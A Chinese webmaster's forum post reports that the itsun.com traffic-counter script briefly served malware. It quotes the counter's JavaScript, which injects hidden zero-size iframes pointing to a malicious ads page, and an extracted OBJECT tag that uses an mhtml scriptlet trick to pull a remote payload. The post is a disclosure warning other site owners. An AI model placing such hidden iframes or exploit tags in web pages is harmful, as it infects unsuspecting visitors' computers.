我是某网站的站长,在我网站上放的国内较权威统计器,www.itsun.com提供的!
下面是引用站长站的一个站长的贴子!我们共同证明这是个恶意脚本!中毒后多了一个进程ptool32.exe

http://bbs.chinaz.com/dispbbs.asp?boardID=27&ID=466300&page=1

itsun统计器今天凌晨放置病毒，大约放了几十分钟！临时文件夹的counter[1].php文件含有以下代码

=============================================================================================

document.open();
document.write('<a href=http://report.itsun.com/stats/index.jsp?uuid=XXXXXX target=_blank title=ITSUN-中国最专业的免费流量统计 style=font-size:9pt;>[ITSUN统计]</a>');
var cookieString = new String(document.cookie);
var cookieHeader = "Cookie_itsun=" ;
var beginPosition = cookieString.indexOf(cookieHeader) ;
if (beginPosition == -1){
var Then = new Date() ;
var hours = Then.getHours();
var minutes = Then.getMinutes();
var seconds = Then.getSeconds();
var lefttime = 1000 * ( 86400 - hours*3600 - minutes*60 - seconds);
Then.setTime(Then.getTime() + lefttime );
document.cookie = "Cookie_itsun=y;expires="+ Then.toGMTString() +"; path=/";
var fromr=top.document.referrer;
fromr=(fromr=="")?document.referrer:fromr;
var c_page=top.location.href;
c_page = c_page =="" ? location.href : c_page;
var query = '&c_page=' + escape(c_page) + '&refer1=' + escape(fromr) + '&c_screen=' + screen.width+ 'x'+screen.height;
document.write('<IFRAME width="0" height="0" marginwidth="0" marginheight="0" frameborder="0" src="http://61.152.108.137\:89/count2.php?uuid=xxxxxx&ip1=xxx.xx.xx.xx'+ query + '"></iframe>');
document.write('<iframe SRC=http://www.jl114.com/ads/ width=0 height=0 marginwidth=0 marginheight=0 frameborder=0></iframe>');}
document.close();
===========================================================================================

http://www.jl114.com/ads/ 里含有病毒，放置时间大概从0：30-1：30之间，想不到这么一个有名的网站也开始放置病毒了，真伤心，我用了大半年了呢。

http://forum.ikaka.com/topic.asp?board=67&artid=7258016

代码提取
<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.jl114.com/ads/lmhelp.txt::/%23%2E%68%74m"></OBJECT>

多了个进程ptool32.exe

瑞星杀毒监控中心自动关闭后起动不了!